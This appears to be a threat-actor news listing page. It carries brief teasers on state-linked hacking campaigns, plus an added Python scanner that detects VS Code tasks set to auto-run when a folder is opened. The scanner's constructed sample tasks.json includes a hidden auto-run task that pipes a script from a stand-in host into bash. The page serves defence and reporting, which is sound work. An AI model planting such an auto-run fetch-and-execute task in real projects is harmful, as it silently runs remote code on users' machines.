Threat Actors
Explore detailed profiles of cyber threat actors — from state-sponsored groups to independent hacker collectives — including their motives, methods, and operations.

Handala Rebounds After FBI Seizure, Exposing Iran Cyberwar Resilience
After the FBI and DOJ seized Handala-linked domains on March 20, 2026, the Iran-linked group restored its web presence within about a day. The case shows why a domain seizure removes an actor's visibility faster than it removes its capability.

North Korean Hackers Deploy StoatWaffle Malware via VS Code Projects
A North Korean threat actor, tracked as WaterPlum, is using malicious Visual Studio Code projects to distribute a new malware family called StoatWaffle. The campaign leverages a feature in VS Code to automatically execute code when a project is opened.
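The teaser does not name the VS Code feature involved. The mechanism that matches the description is the workspace task option `"runOptions": {"runOn": "folderOpen"}` in `.vscode/tasks.json` (or in the `tasks` section of a `.code-workspace` file), which makes VS Code start the task as soon as the folder is opened in a trusted workspace. The scanner below is an added example, not code from the report or the WaterPlum campaign: it walks a directory tree, parses VS Code's JSON-with-comments dialect, and flags any task configured to auto-run, together with the command it would execute and whether its terminal output is suppressed. The embedded `tasks.json` is constructed for illustration; the attribution of the feature to this campaign is an assumption.

```python
import json
import sys
from pathlib import Path

# Constructed sample: one normal build task and one that auto-runs on folder
# open with its terminal hidden. Not taken from the campaign.
SAMPLE_TASKS_JSON = r'''{
    // See https://go.microsoft.com/fwlink/?LinkId=733558 for the schema
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "shell",
            "command": "npm run build",
        },
        {
            "label": "setup",
            "type": "shell",
            "command": "curl -s http://example.invalid/s.sh | bash",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" }
        }
    ]
}'''


def strip_jsonc(text: str) -> str:
    """Convert VS Code's JSON-with-comments (comments, trailing commas) to strict JSON."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:  # copy string bodies verbatim, honouring escapes
            out.append(c)
            if c == "\\" and i + 1 < n:
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
            continue
        if c == '"':
            in_str = True
            out.append(c)
            i += 1
            continue
        if text.startswith("//", i):  # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
            continue
        if text.startswith("/*", i):  # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
            continue
        if c == ",":  # drop a comma directly followed by a closing bracket
            j = i + 1
            while j < n and text[j] in " \t\r\n":
                j += 1
            if j < n and text[j] in "}]":
                i += 1
                continue
        out.append(c)
        i += 1
    return "".join(out)


def _commands(task: dict) -> list:
    """Collect the command strings a task may run, including per-OS overrides."""
    found = []
    for section in (task, *(task.get(k) or {} for k in ("windows", "linux", "osx"))):
        cmd = section.get("command")
        if isinstance(cmd, dict):  # {"value": "...", "quoting": "..."} form
            cmd = cmd.get("value")
        if isinstance(cmd, str) and cmd:
            found.append(" ".join([cmd, *map(str, section.get("args") or [])]))
    return found


def find_auto_run_tasks(tasks_json_text: str) -> list:
    """Return tasks that VS Code would start automatically when the folder is opened."""
    data = json.loads(strip_jsonc(tasks_json_text))
    if "folders" in data:  # a .code-workspace file nests tasks under "tasks"
        data = data.get("tasks") or {}
    hits = []
    for task in data.get("tasks") or []:
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        hits.append({
            "label": task.get("label", "<unnamed>"),
            "commands": _commands(task),
            # reveal=never keeps the terminal closed, so the user sees nothing
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return hits


def scan_workspace(root) -> list:
    """Walk a checkout and report every auto-run task in tasks.json / *.code-workspace."""
    findings = []
    for path in Path(root).rglob("*"):
        is_tasks = path.name == "tasks.json" and path.parent.name == ".vscode"
        if not (is_tasks or path.suffix == ".code-workspace"):
            continue
        try:
            hits = find_auto_run_tasks(path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            findings.append({"file": str(path), "error": str(exc)})
            continue
        findings.extend({"file": str(path), **h} for h in hits)
    return findings


if __name__ == "__main__":
    results = scan_workspace(sys.argv[1]) if len(sys.argv) > 1 \
        else find_auto_run_tasks(SAMPLE_TASKS_JSON)
    for r in results:
        print(json.dumps(r))
```

Run it against a freshly cloned repository before opening the folder in the editor; anything it reports should be read as "this command runs the moment you click Open". The scan is a pre-open check, not a substitute for Workspace Trust: VS Code only starts automatic tasks in a trusted workspace, so keeping untrusted folders in Restricted Mode (and leaving the `task.allowAutomaticTasks` setting off where the organisation does not need it) closes the same door from the editor side.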

FortiGate devices exploited to steal service account credentials and breach networks
SentinelOne says attackers are abusing FortiGate appliances as entry points, extracting configuration data, harvesting service account credentials, and using that access to move deeper into victim networks.

UNC4899 breached crypto firm after developer AirDropped trojanized file to work device
The North Korea-linked threat actor UNC4899 is suspected of breaching a cryptocurrency organization in 2025 after a developer transferred a trojanized file to a work device, leading to a cloud compromise and the theft of millions of dollars in cryptocurrency.

APT28 used BEARDSHELL and COVENANT to spy on Ukrainian military personnel
ESET says the Russian state-sponsored group APT28 has used two implants called BEARDSHELL and COVENANT since April 2024 to conduct long-term surveillance of Ukrainian military personnel.

Fatimion Cyber Team: Inside the Iran-Linked Hacking Group Waging Cyber War Across the Middle East
A pro-Iran cyber group operating out of Iraq has quietly built one of the most persistent hacktivist operations in the Middle East. Known as the Fatimion Cyber Team (فريق فاطميون الالكتروني), this group has been carrying out DDoS attacks, website defacements, database exfiltrations, and coordinated information operations since August 2023. On March 5, 2026, the…

CyberStrikeAI: Chinese-Linked AI Attack Platform Compromises 600+ FortiGate Devices Across 55 Countries
An open-source AI-native offensive security tool called CyberStrikeAI, developed by a Chinese coder with ties to the Ministry of State Security, has been deployed by a Russian-speaking threat actor to compromise over 600 FortiGate appliances across 55 countries. Team Cymru tracked 21 unique servers running the platform, revealing a sharp acceleration in AI-augmented offensive cyber…

D-Knife Spyware: China-Linked APT Hijacks Routers for Cyber Espionage
A look at the D-Knife spyware campaign, a China-linked APT operation that hijacks internet routers for persistent surveillance and data exfiltration. Discover its techni

China-Linked UNC3886 Cyber Espionage Targets Singapore Telecom
China-linked APT UNC3886’s sophisticated cyber espionage against Singapore’s telecom sector highlights evolving nation-state threats to critical infrastructure, demanding executive

German Security Agencies Warn of State-Sponsored Phishing Attacks via Messenger Services
German security agencies issue a joint warning about state-sponsored phishing attacks targeting high-profile individuals via Signal and other messenger services, posing significant